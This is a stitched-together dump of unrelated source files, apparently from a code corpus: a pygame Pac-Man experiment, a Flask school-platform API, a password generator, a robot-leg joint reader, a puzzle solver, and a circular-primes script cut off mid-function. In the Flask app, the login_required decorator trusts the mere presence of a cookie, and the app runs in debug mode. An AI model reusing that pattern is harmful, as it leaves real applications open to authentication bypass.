    Outcomes come from self.sequence. Per episode, protocol over
    `ani_pipeend`: send() the episode type, recv() the go signal, animate;
    once pacman is `nearby()` a goal, recv() a CNN prediction (0 flips his
    direction); on goal contact, send() the action start timestamp.
    """
    # initialize pygame here because apparently it doesn't work if done in __init__
    epi_rem = self.num_episodes
    pygame.init()
    cur_epi = 0
    clock = pygame.time.Clock()
    self.load_stuff()
    crashed = False
    self.score = 0
    # pause here until the animation receives the start signal from the mwm and the reader passes the startup spike
    ani_pipeend.recv()
    while cur_epi < self.num_episodes:
        first_pass = True
        win_lose = self.sequence[cur_epi]
        print("Episode",cur_epi,"/",self.num_episodes-1," ",win_lose)
        self.is_beneficial = random.uniform(0, 1) <= self.b
        won = False
        self.overlap = False
        # show the score and remaining episode screen for 1.85 s
        end_time = time.time() + 1.85
        while time.time() < end_time:
            self.update_remaining_epi(multi_ep=True, epi_rem=self.num_episodes-cur_epi)
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    print("Game killed.")
            pygame.display.update()
        # counter = 0
        self.update_constants()
        self.update_pacman()
        # make sure the direction pacman is facing cannot be determined
        self.obscure_dir()
        # aligns pacman's direction with the prescribed episode outcome
        if (control != -1):
            # print("win/lose:", win_lose)
            # win: walk toward the reward side; lose: walk away from it
            if (win_lose == 1):
                if (self.is_beneficial == True):
                    self.move_left = True
                else:
                    self.move_left = False
            else:
                if (self.is_beneficial == True):
                    self.move_left = False
                else:
                    self.move_left = True
        self.set_speed_direction()
        # update the type of this episode
        self.record_episode_type()
        pygame.display.update()
        # as soon as the episode commences, send the recorder the correct episode type
        ani_pipeend.send([self.epi_type])
        ani_pipeend.recv()
        print("\tCommencing animation at ", time.time())
        # need this loop for the display to display
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                crashed = True
                print("Game killed.")
        # wait to display the episode hangtime seconds
        time.sleep(self.hangtime)
        action_time = time.time()
        counter = 0
        record_times = []
        while not crashed and not self.overlap:
            if (display_freq):
                # this code below finds the frames per second that this simulation is updating at
                if (counter == 10):
                    l = np.average(np.diff(record_times))
                    print("\t\tanimation:", int(1 / l), "Hz")
                    record_times = []
                    counter = 0
                current_time = time.time()
                record_times.append(current_time)
                counter += 1
            # check if game has crashed and exit loop if it has
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    crashed = True
                    print("Game killed.")
            self.update_constants()
            # update pacman's position according to speed variable
            self.x_pacman += self.speed
            self.update_pacman()
            #receive prediction from mwm_pipend
            # NOTE(review): `&` is the bitwise operator; it works here only
            # because both operands are bools — `and` would be the idiomatic form.
            if(self.nearby() & first_pass):
                prediction = ani_pipeend.recv()[0]
                #if prediction = 0, that means the CNN predicted that Pacman is moving in the wrong direction ie 'loss'
                if(prediction == 0):
                    self.move_left = not self.move_left
                    self.set_speed_direction()
                #only check this on Pacman's first run. Once he turns right, eg, he will not be able to turn left again.
                first_pass = False
            # update game state for new episode
            if (self.overlapping()):
                print("\tClosing animation at ", time.time())
                cur_epi += 1
                self.reset_env()
                self.reposition_pacman()
                self.overlap = True
                # self.num_episodes -= 1
                self.immediate_change()
                # self.score = current_score + self.last_change
                self.score += self.last_change
                pygame.display.update()
                for event in pygame.event.get():
                    if event.type == pygame.QUIT:
                        print("Game killed.")
                time.sleep(.25)
                # Tell the recorder when this action window started.
                ani_pipeend.send([action_time])
                self.game_display.blit(self.maze, (0, 0))
                time.sleep(.25)
            # self.update_remaining_epi(multi_ep=True, epi_rem=epi_rem)
            clock.tick(self.update_freq)
            pygame.display.update()
    # Trial finished: show the win/lose screen for 5 s, then shut pygame down.
    if (cur_epi == self.num_episodes):
        self.display_win_screen()
        pygame.display.update()
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                print("Game killed.")
        time.sleep(5)
        pygame.quit()
|
12,417 | a3bcc610d94d2704057b75bd778d5737764803a3 | import os
import re
import datetime
from werkzeug.utils import secure_filename
from flask import Flask, jsonify, request, abort, send_from_directory
from flask_sqlalchemy import SQLAlchemy
from flask_mysqldb import MySQL
from flask_cors import CORS
from flask_bcrypt import Bcrypt
from flask_jwt_extended import (
JWTManager, jwt_required, create_access_token,
jwt_refresh_token_required, create_refresh_token,
get_jwt_identity, set_access_cookies,
set_refresh_cookies, unset_jwt_cookies
)
from flask_wtf.csrf import CSRFProtect
from model import user_model
from model import student_model
from model import lecturer_model
from model import mentor_model
from controller import user_controller, news_controller, blogger_controller
import json
from model import base
from functools import wraps
from flask import g, request, redirect, url_for
import MySQLdb
from inittables import InitTables
from sqlalchemy.orm import relationship, backref
from sqlalchemy.orm import sessionmaker
from model.school_model import School, Faculty, Department, Program, Level
from platform_model import class_mem, class_message, class_model, course_model, course_mem, course_lecturer, course_message
from message_model import group_conv_init, group_conv_mem, personal_conv_init, personal_conv_mem, personal_message_model, group_message_model
from entertainment_model import news_model, blogger_model, featured_image_model, like, comment, news_category
from personal_model import course_reg, calender
from model.user_type import UserType
# Retrieves database configuration from environment variables
mysql_host = os.environ.get('MYSQL_HOST')
mysql_user = os.environ.get('MYSQL_USER')
mysql_password = os.environ.get('MYSQL_PASSWORD')
# NOTE(review): database name is hard-coded for testing; restore the
# os.environ.get('DB_NAME') lookup before deploying.
db_name = 'testing' # os.environ.get('DB_NAME')
UPLOAD_FOLDER = 'uploads'
ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg', 'mp3', 'mp4', 'pdf', 'doc', 'docx'} # Feel free to add more file types to be accepted
MAX_CONTENT_LENGTH = 1024*1024*10 # Maximum file upload size is 10 MB (the old comment said 50 MB, but the value is 10*1024*1024 bytes)
# App flask Configuration
app = Flask(__name__)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://' + mysql_user + ':' + mysql_password + '@' + mysql_host + '/' + db_name
# JWTs travel in cookies (with CSRF double-submit protection), not headers.
app.config['JWT_TOKEN_LOCATION'] = ['cookies']
app.config['JWT_COOKIE_SECURE'] = False
app.config['JWT_ACCESS_COOKIE_PATH'] = '/api/'
app.config['JWT_REFRESH_COOKIE_PATH'] = '/token/refresh'
app.config['JWT_COOKIE_CSRF_PROTECT'] = True
app.config['JWT_SECRET_KEY'] = os.environ.get('JWT_SECRET_KEY') #The Jwt_secret_key is obtained from environment variables
app.config['MAX_CONTENT_LENGTH'] = MAX_CONTENT_LENGTH
app.config['UPLOAD_EXTENSIONS'] = ALLOWED_EXTENSIONS
app.config['UPLOAD_PATH'] = UPLOAD_FOLDER
db = SQLAlchemy(app)
bcrypt = Bcrypt(app)
jwt = JWTManager(app)
# Create any missing tables declared on the shared declarative base.
base.Base.metadata.create_all(db.engine, checkfirst=True)
# This part of the code is to check if the important tables (School, Faculty, Department, Program, Level) have been initialized
Session = sessionmaker(db.engine)
Session.configure()
session = Session()
if session.query(School).count() == 0 or session.query(Faculty).count() == 0 or session.query(Department).count() == 0 or session.query(Program).count() == 0 or session.query(Level).count() == 0 :
    InitTables(session)
controller = user_controller.UserController(db) #Create instance of controller to perform some operations
n_controller = news_controller.NewsController(db) # Create instance of news controller to perform some operations
b_controller = blogger_controller.BloggerController(db) #Create instance of blogger controller to perform some operations
CORS(app)
# Decorator used by routes that require an authenticated session.
def login_required(f):
    """Reject the request unless the csrf_access_token cookie is present."""
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'csrf_access_token' in request.cookies:
            return f(*args, **kwargs)
        return {'Error': 'You have to login first'}
    return decorated_function
# Register a user - either a student, lecturer or mentor
@app.route('/users/register', methods = ['POST'])
def register ():
    """Create a Student, Lecturer or Mentor account from form data.

    Branches on the `user_type` form field; each branch reads its own extra
    fields and rejects emails that are already registered.
    NOTE(review): the broad `except` blocks hide the real failure cause, and
    the `elif email == getemail[0]` branches fall through (returning None /
    HTTP 200 with an empty body) when getemail is set but does not match —
    presumably unreachable, but confirm.
    """
    try:
        # Gets all input data from the user
        user_name = request.form.get('user_name')
        surname = request.form.get('surname')
        first_name = request.form.get('first_name')
        email = request.form.get('email')
        # Passwords are stored as bcrypt hashes, never in plain text.
        password = bcrypt.generate_password_hash(request.form.get('password')).decode('utf-8')
        user_type = request.form.get('user_type')
        getemail = controller.get_email(email) # Checks to see if the entry email is in the database. If not, it returns None
    except:
        return {'Error': 'Unable to retrieve user details'}
    if str(user_type) == 'Student':
        try:
            # Gets additional input for a student
            program_id = request.form.get('program_id')
            matric_no = request.form.get('matric_no')
            level_id = request.form.get('level_id')
            if getemail == None: # If email is not already registered, input the data into the database
                controller.add_data(student_model.Student(
                    user_name, surname, first_name, email, password, user_type, program_id, matric_no, level_id))
                # Students are also enrolled into their program/level class.
                class_id = controller.get_class_id(program_id, level_id)
                user_id = controller.get_user_id(email)
                controller.add_data(class_mem.ClassMem(class_id, user_id))
                return {'success': 'succesfully updated in the database'}
            elif email == getemail[0]: # If email is already used, notify the user
                return {'Error': 'This email has already been used to register'}
        except: # To notify if a student hasn't conformed to an acceptable input format.
            return {'Error': 'Unable to retrieve student details. Ensure the inputs are valid'}
    elif str(user_type) == 'Lecturer':
        try:
            # Get additional inputs for lecturers
            department_id = request.form.get('department_id')
            title = request.form.get('title')
            position = request.form.get('position')
            if getemail == None: # If email is not already registered, input the data into the database
                controller.add_data(lecturer_model.Lecturer(
                    user_name, surname, first_name, email, password, user_type, department_id, title, position))
                return {'success': 'succesfully updated in the database'}
            elif email == getemail[0]: # If email is already used, notify the user
                return {'Error':'This email has already been used to register'}
        except: # To notify if a lecturer hasn't conformed to an acceptable input format.
            return {'Error': "Unable to save lecturer details. Ensure that the inputs are correct"}
    elif str(user_type) == 'Mentor':
        try:
            # Gets additional input data for a mentor
            profession = request.form.get('profession')
            company = request.form.get('company')
            title = request.form.get('title')
            if getemail == None: # If email is not already registered, input the data into the database
                controller.add_data(mentor_model.Mentor(
                    user_name, surname, first_name, email, password, user_type, profession, company, title))
                return {'success': 'succesfully updated in the database'}
            elif email == getemail[0]: # If email is already used, notify the user
                return {'Error': 'This email has already been used to register'}
        except: # To notify if a mentor hasn't conformed to an acceptable input format.
            return {'Error': 'Unable to get mentor details. Ensure that the inputs are correct'}
    else: # To notify if a user hasn't conformed to an acceptable input format.
        return {'Error': 'Unable to get user details. Ensure that the inputs are correct'}
# Look up a single user by primary key.
@app.route('/users/<id>', methods=['GET'])
@login_required
def get_user(id):
    """Return the serialized user record for `id`, or an error dict."""
    try:
        return controller.get_user(id).to_dict()
    except:
        return {'Error': 'User not found'}
# Function to login
@app.route('/token/auth', methods=['POST'])
def login():
    """Authenticate by email/password and set JWT access + refresh cookies.

    Returns 200 with the cookies set on success, 401 (login: False) on any
    failure — unknown email, wrong password, or lookup error.
    """
    # Gets email and password inputed by the user
    email = request.form.get('email')
    pass_word = request.form.get('password')
    try:
        password = controller.get_password(email) # Checks if email has been registered. If this line fails, it runs the except block
        if bcrypt.check_password_hash(password[0], pass_word): # Checks if password is correct
            user_name = controller.get_user_name(email)
            user_id = controller.get_user_id(email)
            # NOTE(review): debug print of the user name — remove for production.
            print(user_name)
            # Both tokens expire after one day.
            access_token = create_access_token(identity={'User name': user_name[0],'id': user_id[0]}, expires_delta=datetime.timedelta(days=1))
            refresh_token = create_refresh_token(identity = {'User name': user_name[0], 'id': user_id[0]}, expires_delta=datetime.timedelta(days=1))
            resp = jsonify({'login': True, 'user name': user_name[0]})
            set_access_cookies(resp, access_token)
            set_refresh_cookies(resp, refresh_token)
            return resp, 200
        else:
            return jsonify({'login': False}), 401
    except:
        return jsonify({'login': False}), 401
@app.route('/token/refresh', methods=['POST'])
@jwt_refresh_token_required
def refresh():
    """Mint a fresh access token for the identity carried by the refresh cookie."""
    identity = get_jwt_identity()
    new_access_token = create_access_token(identity=identity)
    # Attach the new access JWT and its CSRF double-submit cookie.
    response = jsonify({'refresh': True})
    set_access_cookies(response, new_access_token)
    return response, 200
@app.route('/token/remove', methods=['POST'])
def logout():
    """Clear every JWT cookie, logging the client out."""
    response = jsonify({'logout': True})
    unset_jwt_cookies(response)
    return response, 200
# Serve a previously uploaded file from local storage.
@app.route('/uploads/<fc>/<yr>/<mn>/<dy>/<filename>', methods=['GET'])
def get_file(fc, yr, mn, dy, filename):
    """Return the file stored under uploads/<category>/<year>/<month>/<day>/."""
    directory = os.path.join(app.config['UPLOAD_PATH'], fc, str(yr), str(mn), str(dy))
    return send_from_directory(directory, filename)
#checks file category
def get_file_category(uploaded_file):
    """Return the major MIME type of an uploaded file.

    E.g. 'image' for 'image/png', 'application' for 'application/pdf'.
    The original used re.findall('(.*)\\/', ...), whose '\\/' is an invalid
    escape sequence (DeprecationWarning) and needlessly regex-based; a plain
    rsplit on the final '/' yields the same greedy prefix.
    """
    file_mime = uploaded_file.content_type
    # extracts the file format e.g application, media, etc
    return file_mime.rsplit('/', 1)[0]
#This route is to upload a file
@app.route('/api/file', methods=['POST'])
@jwt_required
def uploadfeaturedimage_file():
    """Save an uploaded file under uploads/<category>/<year>/<month>/<day>/
    and return a status plus a retrieval link.

    Fixes over the original:
    - os.path.splitext handles multi-dot names ("archive.tar.gz" previously
      yielded extension "tar") and names without a dot (previously IndexError).
    - os.makedirs(..., exist_ok=True) removes the isdir/makedirs race, the
      duplicated save call, and a leftover debug print.
    """
    uploaded_file = request.files['file']
    # Timestamp both names the file uniquely and dates its directory.
    ts = int(datetime.datetime.now().timestamp())
    date = datetime.datetime.fromtimestamp(ts)
    yr = date.year
    mn = date.month
    dy = date.day
    filename = secure_filename(uploaded_file.filename)
    if filename != '':
        name, ext = os.path.splitext(filename)
        file_ext = ext.lstrip('.').lower()
        file_category = get_file_category(uploaded_file)
        if file_ext not in app.config['UPLOAD_EXTENSIONS']:
            abort(400, description="File format not supported")
        filename = name + str(ts) + '.' + file_ext
        try:
            directory = os.path.join(app.config['UPLOAD_PATH'], file_category, str(yr), str(mn), str(dy))
            os.makedirs(directory, exist_ok=True)
            uploaded_file.save(os.path.join(directory, filename))
            stat = 'upload successful' # Default status if file upload is successful
            link = 'http://127.0.0.1:5000/uploads/' + file_category + '/' + str(yr) + '/' + str(mn) + '/' + str(dy) + '/' + str(filename)
        except:
            stat = 'upload not succesful'
            link = 'no link returned because upload was unsuccessful'
        return {'status': stat, 'link': link}
# Create a Course by a lecturer
@app.route('/course/create', methods=['POST'])
@login_required
def course_create():
    """Create a course from the code/title/unit form fields."""
    try:
        # Pull the course attributes out of the form.
        code = request.form.get('code')
        title = request.form.get('title')
        unit = request.form.get('unit')
    except:
        return {'Error': 'Unable to retrieve course details'}
    try:
        # Normalize the code: strip internal spaces and upper-case it.
        normalized_code = code.replace(" ", "").upper()
        controller.add_data(course_model.Course(normalized_code, title, unit))
        return {'Status': 'Course registered successfully'}
    except: # Exception as e:
        # raise
        return {'Status': 'registration not successfully'}
# Join a course created
@app.route ('/course/join', methods=['POST'])
@login_required
def course_join():
    """Add a user to a course; lecturers are additionally recorded as course staff."""
    try:
        # Get all inputs from the user
        course_id = request.form.get('course_id')
        user_id = request.form.get('user_id')
    except:
        return {'Error': 'Unable to retreive details'}
    # add data in the course_memmber table
    try:
        controller.add_data(course_mem.CourseMem(course_id, user_id))
        # Lecturers get an extra row in the course_lecturer table.
        if controller.get_user_type(user_id) == UserType.Lecturer:
            controller.add_data(course_lecturer.CourseLecturer(course_id, user_id))
        return {'Status': 'Successfully joined the course'}
    except:
        return {'Error': 'Unable to join course'}
# List the active courses the given user belongs to.
@app.route('/courses/<id>', methods=['GET'])
@login_required
def courses(id):
    """Return the active courses for user `id`, or an error dict."""
    try:
        return controller.get_courses(id)
    except:
        return {'Error': 'failed to get courses'}
# Register a Course by a Student
@app.route('/course/register', methods=['POST'])
@login_required
def course_register():
    """Record a student's registration for a course in a semester/session."""
    try:
        # Gets all input data from the student
        # NOTE(review): request.form.get does not raise for missing keys,
        # so this try mainly guards against a missing form altogether.
        student_id = request.form.get('student_id')
        course_id = request.form.get('course_id')
        grade_id = request.form.get('grade_id')
        semester = request.form.get('semester')
        session_id = request.form.get('session_id')
    except:
        return {'Error': 'Unable to retreive details'}
    try:
        # add the data to the database
        controller.add_data(course_reg.CourseRegistration(student_id, course_id, grade_id, semester, session_id))
        return {'Status': 'Successfully registered the course'}
    except:
        return {'Error': 'Unable to register the course'}
# List every course registration for a student.
@app.route('/courses/registered/<id>', methods=['GET'])
@login_required
def registered_courses(id):
    """Return the registered courses for student `id`."""
    return controller.get_registered_courses(id)
# Route to update the event for a user.
@app.route('/calendar/update', methods=['POST'])
@login_required
def update_calendar(): #where id is the user_id
    """Insert or update a user's calendar events.

    The update timestamp is generated server-side. The original also read an
    'updated_at' form field that was never used; that dead read is dropped.
    """
    try:
        user_id = request.form.get('user_id')
        data = request.form.get('data')
    except:
        return {'Error': 'Unable to retreive data sent'}
    try:
        ts = datetime.datetime.now()
        controller.update_event(user_id, data, ts)
        return{'success': 'event successfully inserted or updated'}
    except:
        return{'Error': 'error updating event'}
#This route is to like a news
@app.route('/api/news/like', methods=['POST'])
@jwt_required
def like_news():
    """Record a like by the authenticated user on the given news item."""
    # The user identity comes from the JWT, not the form.
    user = get_jwt_identity()
    user_id = int(user['id'])
    # Likes are timestamped with the server's current time, stored as a string.
    ts = datetime.datetime.now()
    ts = str(ts)
    try:
        # Gets all input data from the user
        # Get the news user wants to like
        news_id = request.form.get('news_id')
    except:
        return {'Error': 'Invalid news_id'}
    try:
        n_controller.like_news(news_controller.Like(user_id, news_id, ts))
    except:
        return {'Error': 'unable to like news'}
    return{'status': 'liked'}
# Remove the authenticated user's like from a news item.
@app.route('/api/news/unlike', methods=['POST'])
@jwt_required
def unlike_news():
    """Delete the calling user's like on the given news item."""
    identity = get_jwt_identity()
    uid = int(identity['id'])
    try:
        # The target news item comes from the form body.
        target_news = request.form.get('news_id')
    except:
        return {'Error': 'Invalid news_id'}
    try:
        n_controller.unlike_news(uid, target_news)
    except:
        return {'Error': 'unable to unlike news'}
    return{'status': 'unliked'}
#This route is to comment on a news
@app.route('/api/news/comment', methods=['POST'])
@jwt_required
def comment_news():
    """Store a comment by the authenticated user on the given news item."""
    # The commenting user comes from the JWT identity.
    user = get_jwt_identity()
    user_id = int(user['id'])
    # Comments are timestamped with server time, stored as a string.
    ts = datetime.datetime.now()
    ts = str(ts)
    try:
        # Gets all input data from the user
        # Get the news user wants to comment on
        news_id = request.form.get('news_id')
        comment = request.form.get('comment') # This is the user's comment
    except:
        return {'Error': 'Invalid news_id'}
    try:
        n_controller.comment_news(
            news_controller.Comment(user_id, news_id, comment, ts))
    except:
        return {'Error': 'unable to comment on news'}
    return{'status': 'commented'}
# Retrieve every like recorded against a news item.
@app.route('/api/likes/<news_id>', methods=['GET'])
@jwt_required
def get_likes(news_id):
    """Return all likes for the given news item."""
    return n_controller.get_likes(news_id)
# Retrieve every comment recorded against a news item.
@app.route('/api/comments/<news_id>', methods=['GET'])
@jwt_required
def get_comments(news_id):
    """Return all comments for the given news item."""
    return n_controller.get_comments(news_id)
#This route is to get the info in a specific news based on the news_id
@app.route('/api/news/<int:news_id>', methods=['GET'])
@jwt_required
def get_news(news_id):
    """Return one fully-hydrated news item (author, body, category, featured
    image, like/comment counts, and whether the caller has liked it).

    Any lookup failure inside the try collapses to status 'failed' with
    news = 'Record not found'.
    """
    user = get_jwt_identity()
    user_id = int(user['id'])
    try:
        news_object = n_controller.get_news(news_id)
        blogger_id = news_object.blogger_id
        blogger_name = b_controller.blogger_name(blogger_id)
        content = news_object.content
        title = news_object.title
        category_id = news_object.category_id
        category = n_controller.get_category(category_id)
        ts = news_object.timestamp
        featured_image_object = n_controller.get_featuredimage(news_id)
        featured_image = featured_image_object.image
        no_of_likes = n_controller.get_no_likes(news_id)
        no_of_comments = n_controller.get_no_comments(news_id)
        # Whether THIS caller has already liked the item.
        user_like = n_controller.user_like(user_id, news_id)
        status = 'success'
        news = {'blogger_name': blogger_name, 'title': title, 'content': content, 'category': category,'featured image': featured_image, 'no of likes':no_of_likes, 'no of comments': no_of_comments, 'user like ?': user_like, 'time': ts}
    except:
        news = 'Record not found'
        status = 'failed'
    return {'status': status, str(news_id):news}
#This route is to get news in a news page
# per means the number per page and page_num means the page number
@app.route('/api/newslist/<int:per>/<int:page_num>', methods=['GET'])
@jwt_required
def get_news_list(per, page_num):
    """Return one page of news headlines keyed by news id.

    per: items per page (0 falls back to 20); page_num: 1-based page number
    (0 falls back to 1). status is 'success' when the page is non-empty.
    Fixes over the original: iterates the page items directly instead of
    indexing via range(len(...)), and drops a leftover debug print.
    """
    if page_num == 0:
        page_num = 1
    if per == 0:
        per = 20
    threads = db.session.query(news_model.News).paginate(per_page=per, page=page_num, error_out=False)
    news = {}
    status = 'failed'
    if threads.items:
        for item in threads.items:
            blogger_name = b_controller.blogger_name(item.blogger_id)
            news.update({item.id: {'news_id': item.id,
                                   'blogger_name': blogger_name, 'title': item.title}})
        status = 'success'
    return {'news_list': news, 'status': status}
# Run the Flask development server when executed directly (never in production).
if __name__ == '__main__':
    app.run(debug=True)
|
12,418 | 242771917b53f281b783874e9ce44670ade0b592 |
# M.R. Sorell
# Project Python password generator
# letters : ask how many letters
# numbers : ask how many numbers
# symbols : ask how many symbols
# generate a random password
import random
print("Welcome to the password generator")
letters = int(input("How many letters do you want in your password: "))
integers = int(input("How many numbers do you want in your password: "))
symbols = int(input("How many symbols do you want in your password: "))
count = letters + integers + symbols
alphabet = "abcdefghijklmnopqrstuvwxyz"
alpha_code = list(alphabet)
# NOTE(review): '0' is absent from the digit pool — confirm whether intentional.
numbers = "123456789"
num_code = list(numbers)
special = "$%&?!+"
special_code = list(special)
# random.choices samples WITH replacement, so any requested count is valid;
# the original random.sample raised ValueError for more than 26 letters,
# 9 digits or 6 symbols.
alpha = random.choices(alpha_code, k=letters)
nums = random.choices(num_code, k=integers)
# Renamed: the original reused `symbols` for both the count and the sample.
symbol_chars = random.choices(special_code, k=symbols)
new_string = alpha + nums + symbol_chars
# Shuffle in place so the character classes are interleaved.
password = new_string
random.shuffle(password)
sep = ""
password_result = sep.join(password)
print(password_result)
print(f"Your new password is {password_result}")
12,419 | bf57cd7e10e344144ec0d3b4f4d1e0f3642e1ee3 | #!/usr/bin/python3 -B
# Programming for passively reading the joint angles on the monopod
from moteus_ctrlr.src.two_d_leg_class import Leg
from ctrlrs.ik.sin_ik_hop_ctrlr import sinIkHopCtrlr
import numpy as np
import asyncio
import math
import moteus
import time
import argparse
import sys
async def main():
    """Continuously poll and print the monopod's joint angles (passive read).

    Each cycle re-zeros both servo encoders, queries their positions, feeds
    them through the IK controller's forward kinematics, prints the result,
    and clears motor faults. Runs until interrupted.
    """
    kn_id = 1
    hp_id = 2
    ctrlr_x = ctrlr_y = 0
    # create the leg class
    monopod = Leg(kn_id, hp_id) # TODO: double check the motor port id's
    # create controller class
    # l0 = ~100 mm
    # l1 = ~150 mm
    # NOTE: sin controller: Kp, dt, l0, l1, animation)
    ctrlr = sinIkHopCtrlr(25.0, 0.015, 0.1, 0.15, False)
    # clearing any faults
    await monopod.stop_all_motors()
    # Reading each servo's position through each moteus controller corresponding
    # to each servo_id in Leg.servos
    while True:
        # update the current pos to the closest one which is consistent with an output pos
        await monopod.servos[monopod.hip_pitch].set_rezero(0.0, query=True)
        await monopod.servos[monopod.knee].set_rezero(0.0, query=True)
        result_kn = result_hp = None
        # Retry until both queries return: `(a and b) is None` stays True
        # while either result is still None, so this loops until both are set.
        while (result_hp and result_kn) is None:
            result_hp = await monopod.servos[monopod.hip_pitch].query()
            result_kn = await monopod.servos[monopod.knee].query()
        # now we have all the info about the actual monopod's joint positions,
        # so now we must convert & feedback that info to the ctrlr
        ctrlr.theta0 = ctrlr.convert_enc_rad_hp(result_hp.values[moteus.Register.POSITION])
        ctrlr.theta1 = ctrlr.convert_enc_rad_kn(result_kn.values[moteus.Register.POSITION])
        ctrlr_x, ctrlr_y = ctrlr.fwrd_kinematics()
        print("hp pos: ", result_hp.values[moteus.Register.POSITION])
        print("kn pos: ", result_kn.values[moteus.Register.POSITION])
        #print("fk hp pos: ", ctrlr.convert_rad_enc_hp(ctrlr.theta0))
        #print("fk kn pos: ", ctrlr.convert_rad_enc_kn(ctrlr.theta1))
        #print("theta0: ", np.degrees(ctrlr.theta0))
        #print("theta1: ", np.degrees(ctrlr.theta1))
        print("q[0]: ", ctrlr_x)
        print("q[1]: ", ctrlr_y)
        print("---------------------------------------------------------")
        await monopod.stop_all_motors()
# Entry point: run the read loop on the asyncio event loop.
if __name__ == "__main__":
    asyncio.run(main())
|
12,420 | 8e7b5e60e637438d85f44657b61a66f4641f20c1 | import argparse
from collections import namedtuple, defaultdict
# A line segment between integer grid points (x1,y1) and (x2,y2).
Line = namedtuple('Line', ['x1', 'y1', 'x2', 'y2'])
parser = argparse.ArgumentParser()
# Optionally also count diagonal lines (part 2 of the puzzle).
parser.add_argument('--include-diagonals', action='store_true')
args = parser.parse_args()
# Parse "x1,y1 -> x2,y2" rows from the input file into Line tuples.
lines = []
with open('input') as f:
    for row in f:
        p1, p2 = row.strip().split(' -> ')
        x1, y1 = p1.split(',')
        x2, y2 = p2.split(',')
        line = map(int, [x1, y1, x2, y2])
        lines.append(Line(*line))
# Count how many lines cover each grid point.
points = defaultdict(int)
for line in lines:
    if line.x1 == line.x2:
        # Vertical line: walk y from the smaller to the larger endpoint.
        y1, y2 = sorted([line.y1, line.y2])
        for y in range(y1, y2 + 1):
            points[(line.x1, y)] += 1
    elif line.y1 == line.y2:
        # Horizontal line.
        x1, x2 = sorted([line.x1, line.x2])
        for x in range(x1, x2 + 1):
            points[(x, line.y1)] += 1
    elif args.include_diagonals:
        # Diagonal: step each axis toward its endpoint; zip pairs the
        # coordinates in lockstep (correct for 45-degree segments).
        if line.x2 > line.x1:
            x_range = range(line.x1, line.x2 + 1)
        else:
            x_range = range(line.x1, line.x2 - 1, -1)
        if line.y2 > line.y1:
            y_range = range(line.y1, line.y2 + 1)
        else:
            y_range = range(line.y1, line.y2 - 1, -1)
        for point in zip(x_range, y_range):
            points[point] += 1
# Answer: number of points covered by at least two lines.
overlap = len([p for p, c in points.items() if c > 1])
print(overlap)
|
12,421 | 5769510870008b8b4363942eed7b95ae62d4d9a8 | import pygame
width, height = 800, 417
window = pygame.display.set_mode((width, height))
background = pygame.image.load('images/bg.png')
pygame.display.set_caption('scrolling background')
# Two copies of the background scroll left together; bgX2 starts one
# image-width to the right so the pair tiles seamlessly.
bgX = 0
bgX2 = background.get_width()
class PLAYER(object):
    """Side-scrolling runner sprite with 'ready', 'run' and 'sliding' states."""
    def __init__(self, x, y, vel):
        # Screen position and horizontal speed in pixels per frame.
        self.x = x
        self.y = y
        self.vel = vel
        self.status = 'run'
        self.imgCurrentStatus = pygame.image.load('images/S5.png')
        # Run-cycle animation frames (images 7.png .. 15.png).
        self.playerImg = [pygame.image.load('images/{}.png'.format(x)) for x in range(7, 16)]
        self.count = 0
        self.imgSilde = pygame.image.load('images/S2.png')
        self.countSliding = 0
    def display(self):
        """Draw the sprite for the current state and advance its animation."""
        if self.status == 'ready':
            window.blit(self.imgCurrentStatus, (self.x, self.y))
        # Pressing DOWN switches into the slide animation.
        keys = pygame.key.get_pressed()
        if keys[pygame.K_DOWN]:
            self.status = 'sliding'
        if self.status == 'run':
            self.x += self.vel
            # Wrap the animation index before indexing the frame list.
            if self.count >= len(self.playerImg):
                self.count = 0
            window.blit(self.playerImg[self.count], (self.x, self.y))
            self.count += 1
            # Clamp against the right edge of the window.
            if self.x >= width - 50:
                self.x = width - 50
        if self.status == 'sliding':
            self.x += self.vel
            # The slide sprite sits a little lower than the run sprite.
            window.blit(self.imgSilde, (self.x, self.y+30))
            self.countSliding += 1
            # NOTE(review): countSliding is never reset, so after the first
            # slide the state flips back to 'run' on the very next frame.
            if self.countSliding > 10 :
                self.status = 'run'
player = PLAYER(30, height - 110, 5)
def display():
    """Draw both background layers and the player, then flip the frame."""
    window.blit(background, (bgX, 0))
    window.blit(background, (bgX2, 0))
    player.display()
    pygame.display.update()
while True:
    display()
    pygame.time.Clock().tick(30)  # cap the loop at ~30 FPS
    bgX -= 16  # Move both background images back
    bgX2 -= 16
    # Recycle each background copy once it scrolls fully off screen.
    if bgX < background.get_width() * -1:
        bgX = background.get_width()
    if bgX2 < background.get_width() * -1:
        bgX2 = background.get_width()
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            quit()
    # NOTE(review): display() runs both at the top and the bottom of the
    # loop, so every frame is rendered twice — confirm one call can go.
    display()
|
12,422 | e3019c6b8fdf2dec179375c1c6dceef85a3cba26 | #!/usr/bin/python
#/* -.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
#
#* File Name : solve.py
#
#* Purpose :
#
#* Creation Date : 30-09-2011
#
#* Last Modified : Sun 02 Oct 2011 07:08:07 PM EEST
#
#* Created By : Greg Liras <gregliras@gmail.com>
#
#_._._._._._._._._._._._._._._._._._._._._.*/
def rotations(prime):
    """Return every digit rotation of *prime* as a list of ints.

    The first element is the number itself; rotations whose leading
    digit is zero collapse to smaller integers via int().
    """
    digits = str(prime)
    return [int(digits[shift:] + digits[:shift]) for shift in range(len(digits))]
def get_allPrimes(limit):
    """Return all primes below *limit* via trial division, ascending.

    Fixes over the original: the Python-2-only debug print of every prime
    is removed, and trial division stops once prime*prime exceeds the
    candidate instead of scanning every known prime, which makes
    limit=1000000 tractable.
    """
    pList = [2]
    for i in range(3, limit, 2):
        isprime = True
        for prime in pList:
            if prime * prime > i:
                break  # no divisor up to sqrt(i) => i is prime
            if i % prime == 0:
                isprime = False
                break
        if isprime:
            pList.append(i)
    return pList
def testAll(primeList):
n = 0
while primeList:
print len(primeList)
prime = primeList[0]
circs = rotations(prime)
found = n
for rot in circs:
for i in range(len(primeList)):
buff = primeList[i]
if rot > buff:
